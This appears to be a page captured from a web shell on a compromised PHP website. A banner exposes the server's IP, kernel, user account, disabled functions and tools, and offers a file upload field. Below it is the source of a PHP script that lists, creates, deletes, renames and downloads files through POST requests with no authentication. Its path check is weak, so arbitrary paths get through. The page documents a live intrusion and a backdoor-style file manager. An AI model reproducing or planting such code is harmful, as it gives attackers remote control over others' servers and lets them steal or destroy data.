| Server IP : 79.136.114.73 / Your IP : 3.142.144.163 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/evacuationplans.astacus.se/images/scripts/ |
Upload File : |
<?php
$allowabsolute = "false";
if ($_SERVER['REQUEST_METHOD'] == "POST")
{
$cmdStr = $_POST['cmd'];
if ($cmdStr != "")
{
// Check input parameters.
$val1 = $_POST['val1'];
if ($val1 != "")
{
if(get_magic_quotes_gpc()) $val1 = stripslashes($val1);
if ($allowabsolute == "false")
{
if ((substr_count($val1, "/..")>0) || (substr_count($val1, "\\..")>0))
{
header("HTTP/1.1 403");
exit;
}
$val1 = $upload_dir.$val1;
}
}
$val2 = $_POST['val2'];
if ($val2 != "")
{
if(get_magic_quotes_gpc()) $val2 = stripslashes($val2);
if ($allowabsolute == "false")
{
if ((substr_count($val2, "/..")>0) || (substr_count($val2, "\\..")>0))
{
header("HTTP/1.1 403");
exit;
}
$val2 = $upload_dir.$val2;
}
}
// Process filesystem command.
if ($cmdStr == "list")
{
$dirStr = $val1;
if ($dirStr != "")
{
print("\n");
print("<pre>\n");
if ($dh = opendir($dirStr))
{
while (($file = readdir($dh)) !== false)
{
if ($file == "." || $file == "..") continue;
$date = fileatime($dirStr."/".$file);
$name = basename($dirStr."/".$file);
$size = filesize($dirStr."/".$file);
$type = "file";
if (is_dir($dirStr."/".$file)) $type = "dir";
print($type." ".$date." ".$size." ".$name."<br>\n");
}
closedir($dh);
}
print("</pre>\n");
exit;
}
}
else if ($cmdStr =="mkdir")
{
$mkdirStr = $val1;
if ($mkdirStr != "")
{
$created = mkdir($mkdirStr);
if ($created === true)
{
header("HTTP/1.1 204");
}
else
{
header("HTTP/1.1 403");
}
exit;
}
}
else if ($cmdStr == "del")
{
$delStr = $val1;
if ($delStr != "")
{
$deleted = false;
if (is_dir($delStr))
{
$deleted = rmdir($delStr);
}
else
{
$deleted = unlink($delStr);
}
if ($deleted === true)
{
header("HTTP/1.1 204");
}
else
{
header("HTTP/1.1 403");
}
exit;
}
}
else if ($cmdStr == "move")
{
$fromStr = $val1;
$toStr = $val2;
if (($fromStr != "") && ($toStr != ""))
{
$renamed = rename($fromStr,$toStr);
if ($renamed === true)
{
header("HTTP/1.1 204");
}
else
{
header("HTTP/1.1 403");
}
exit;
}
}
else if ($cmdStr == "download")
{
if ($keepalive == "false") header("Connection: close");
$fileStr = $val1;
if (($fileStr != "") && ($fileStr != ""))
{
if (file_exists($fileStr)==true)
{
header("Content-Length: ".filesize($fileStr));
$fin = fopen($fileStr, "rb");
while (!feof($fin))
{
$read = fread($fin,4096);
print($read);
flush();
}
fclose($fin);
}
else
{
header("HTTP/1.1 403");
}
exit;
}
}
exit;
}
}
?>